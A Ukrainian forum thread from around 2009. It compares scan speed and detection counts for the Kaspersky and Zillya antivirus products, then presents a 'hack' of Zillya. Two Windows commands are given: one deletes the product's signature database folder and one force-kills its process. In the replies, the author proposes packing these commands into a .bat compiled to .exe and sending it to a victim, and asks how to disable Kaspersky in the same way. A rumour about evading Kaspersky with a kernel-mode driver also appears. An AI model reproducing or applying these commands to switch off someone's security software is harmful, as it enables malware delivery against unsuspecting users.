Тест антивірус Kaspersky vs антивірус Zillya - Взлом антивіруса Zillya

[ZEXEL]

Тест антивірус Kaspersky vs антивірус Zillya

Вступ

Кожен, хто купує домашній комп'ютер, незалежно від його призначення, рано чи пізно стикається з проблемою вибору оптимального захисту ПК. Хоч операційна система і має штатні засоби захисту, але більшість шкідливих програм вони не можуть знешкодити. Тому антивірус - одне з перших програм, яка повинна встановлюватися на будь-який комп'ютер.

Сьогодні я хотів би зробити невеликий тест двох антивірусів, перших з них це російський Антивірус від Лабораторії Касперського та Українських антивірус Zillya. Змагання двух держав, або хто більш надійних в безпеці комп'ютеру.

Відразу варто зробити застереження, що стовідсотковий захист комп'ютера не зможе забезпечити жоден антивірус. Також неможливо виявити кращий програмний продукт. У кожного захисника системи є свої прихильники серед користувачів, які впевнені, що їх антивірус - найбільш надійний і зручний, частково вони мають рацію.

Опис від розробників:

Антивірус Лабораторії Касперського

* Передові антивірусні технології;
* Інтелектуальна захист в режимі реального часу;
* Кращий захист при роботі в інтернеті та з електронною поштою;
* Блокування підозрілих дій програм;
* Захист від крадіжки логінів, паролів та інших особистих даних;
* Забезпечення безпечної роботи в бездротових мережах;
* Мінімальна вплив на роботу комп'ютера;
* Новий інтуїтивно зрозумілий інтерфейс;
* Режим безпечного запуску програм;
* Віртуальна клавіатура.

Антивірус Zillya

* Безкоштовний, надійний, ефективний;
* Виявляє та знешкоджує будь-які загрози;
* Багаторівнева система захисту від шпигунських та рекламних програм;
* Унікальні технології розпізнавання нових та невідомих загроз (евристичний аналіз);
* Миттєве блокування небезпечних файлів, що можуть проникнути на комп'ютер з поштових повідомлень або з мережі Інтернет;
* Можливість інсталювати Zillya! Антивірус навіть на заражений комп'ютер;
* Інтелектуальний механізм підбору оптимальної дії над виявленою загрозою;
* Україномовна підтримка.

Тестування

Для тестування були взяті такі продукти:

1 ) Антивірус Касперського 2009 8.0.0.506
Дата оновлення антивірусної бази: 23.09.2009
2 ) Антивірус ZIllya 1.0.1203.0
Дата оновлення антивірусної бази: 27-08-2009

Тестування проводилося на лаптопі з такими параметрами:

Операційна система: Windows 7 build 7100
Процессор: Athlon Dual-Core QL-60
ОЗУ: 3 Гігабайти
Відеоконтролер: Nvidia Geforce 8200M

Для тестування антивірусів були взяті два архіви вірусів, котрі ми будемо сканувати для отримання результатів. Архіви були взяти в інтернеті, котрим вже більше ніж рік, тому тестування антивірусів будуть старі віруси, з них немає вірусів які зараз найбільше активні.

1 ) Тестування архіву котрий налічує 7100 об'єктів.

Антивірус Касперського 2009 8.0.0.506



Час за котрий відбувалося сканування архіву : 14 хвилин 34 секунди.

Антивірус ZIllya 1.0.1203.0



Час за котрий відбувалося сканування архіву : 12 хвилин 6 секунди.

2 ) Тестування архіву котрий налічує 100 об'єктів.

Антивірус Касперського 2009 8.0.0.506



Час за котрий відбувалося сканування архіву : 35 секунд.

Антивірус ZIllya 1.0.1203.0



Час за котрий відбувалося сканування архіву : 23 секунди.

Результати тестування:

Закінчилися сканування архівів на віруси та можна підводити ітоги тестування, хотів відмітити сразу, що новий антивірус українсього проекту показав достойні результати тестування.

1 ) Кількість: 7000 об'єктів. Перше тестування відбувалося пивний час, антивірус Zillya показав непоганий час сканування 12 хвилин та 6 секунд, а Антивірус Касперсього працював не так швидко 14 хвилин 34 секунди.

Знайденні віруси:

Антивірус Касперсього: 6327
Антивірус Zillya: 6381 - переможець

2 ) Кількість: 100 об'єктів. В другому тестування антивірус Zillya показав знову найшвидший час сканування 23 секунди, в порівння з Антивірусов Касперсього 35 секунд.

Знайденні віруси:

Антивірус Касперсього: 65
Антивірус Zillya: 74 - переможець

Взлом Антивіруса Zillya - Обхід обмеження

Для того щоб обійти обмеження антивіруса Zillya потрібно написати код для командної строки.
В Антивірусі не стоїть безпечної системи котра б відповідала за безпеку.

Скрипт котрий видаляє бази антивіруса:

Код:

rmdir "%HOMEDRIVE%\Users\All Users\Zillya Antivirus\" /s /q

Після цього можна вже вимикати антивірус:

Код:

taskkill /im zillya.exe /f

Після цього антивірус відключений, та можна робити все, що завгодно.
Після перезавантаження антивіруса, він навіть нічого не сказав, що бази немає.

Автор: Радченко Віктор aka ZEXEL спеціально для [Посилання заблоковане: Зареєструйтесь!]

[poohitan]

Круто, дуже дякую, я вірив у наше Зілля! Сподіваюсь згодом дірку зі скриптом виправлять. До речі на сайті Зілля здається є можливість написати розробникам побажання, може напиши?

[ZEXEL]

Цитата:

Круто, дуже дякую, я вірив у наше Зілля! Сподіваюсь згодом дірку зі скриптом виправлять. До речі на сайті Зілля здається є можливість написати розробникам побажання, може напиши?

Так, знаю про це, розмістив цю же тему на форумі розробника.
Подивимся, що відпишеться адміністрація.
Майбутне у антивіруса є, якщо в потрібному руслі рухатися.
Але по результатам сканування антивірус Zillya показав найкращий результат, а також швидкість сканування порадувала.

Зараз встановлений антивірус Zillya, але без жодної бази, нічого не каже навіть - це мене тривожить.

[ADR]

знайшов швидко і багато це радує))
цікаво чи велика кількість хибних звинувачень...

[sandric]

Круто, але мені не зрозуміло:

Цитата:

rmdir "%HOMEDRIVE%\Users\All Users\Zillya Antivirus\" /s /q

Ти набрав строку під тим кому належать права доступу до теки?
Якщо так то це якби не вразливість здається). Ну просто він нічого не каже коли ти його видаляєш. От якби ти написав vba-скрипт і відправив собі на мило, а потім на ньому клацнув, можна було б перевірити, чи запускає він чужі скрипти, що модифікують теки користувача.
З.І. Якщо цікаво, я колись проходив у апріоріті курси по написанню дров під мастдаєм то стосовно Касперського - тьютор нам казав (я вже правда точно не пам'ятаю) що здється якщо написати під кернел-мод дровиняку, яка запускає процес з ненайнижчим (там вижче якогось) irq то касперський взагалі нічого ні на що не скаже, навіть при будь-яких оновленнях бази - у нього це в ядрі прописано).

[ZEXEL]

Цитата:

Круто, але мені не зрозуміло:

Ти набрав строку під тим кому належать права доступу до теки?
Якщо так то це якби не вразливість здається). Ну просто він нічого не каже коли ти його видаляєш. От якби ти написав vba-скрипт і відправив собі на мило, а потім на ньому клацнув, можна було б перевірити, чи запускає він чужі скрипти, що модифікують теки користувача.
З.І. Якщо цікаво, я колись проходив у апріоріті курси по написанню дров під мастдаєм то стосовно Касперського - тьютор нам казав (я вже правда точно не пам'ятаю) що здється якщо написати під кернел-мод дровиняку, яка запускає процес з ненайнижчим (там вижче якогось) irq то касперський взагалі нічого ні на що не скаже, навіть при будь-яких оновленнях бази - у нього це в ядрі прописано).

Це вразливість з котрої можна видаляти бази під стандартним користувачем, якщо є обмеження на права користувача то мабуть не буде працювати видалення бази.

Нащо писати vbs скрипт ? Пишемо .bat файл, потім компілюємо під .exe якщо нам потрібно и кидаємо жертві - якщо в неї стоїть антивірус Zillya. І після цього ви можете робити любі команди.

Про касперсього деталі можеш розповісти ? Хотів би почитати як відключити його, на стандартній умові немає прав віключити.

Доречі в якій директорії знаходяться бази Антивіруса Касперського ? Щоб довго не шукати.

[1vanu4]

Я в такому легенькому шоці=)

[sandric]

vba я для прикладу написав, звичайно можна любий виконуваний модуль запихнути. Ну для юзерів, котрі не то що під мастдаєм сидять, а котрі навіть не створюють для себе рахунок, який не встановлював вінду та зілля прокатить).
Але все ж ти мене зацікавив вірусами (сам я таким не цікавлюся дуже)). От наприклад - в нас стоїть зілля, і ми написали скажімо батник і його відкриває жертва, що залогинилася не під рутом, і доступу до директорії "%HOMEDRIVE%\Users\All Users\Zillya Antivirus\" у неї нема. Що тоді? Які взагалі бувають методи зміни сессії користувача?
З.І. зелені літерки виглядають прикольно). Іще було б классно якби було те, що я вже десь писав - підсвітка коду. Я звичайно не в курсі, чи є така шняга для команд шеллу, та можна спробувати написати)

[Rikob]

Шок!!!!!

[chezz]

Чого шок?
Українські програмісти одні з найкращих в світі.
Зілля у мене вже місяць, всім задоволений, абсолютно.

[Rikob]

Просто кажуть що комп від нього гальмує

[chezz]

Цитата:

Допис від Hoops [Посилання заблоковане: Зареєструйтесь!]

Просто кажуть що комп від нього гальмує

Це я писав, програми трішки туплять, в основному це winrar
а так все чудово...

[Dimi4]

Ставив його собі. Єдине в чому я побачив проблему - використання ресурсів. Це забагато. Потрібно якось оптимізувати нашим кодерам цей чудовий антивірус.
Саме із-за цього, я не буду ним наразі користуватись.

[Rikob]

А я взяв на тести!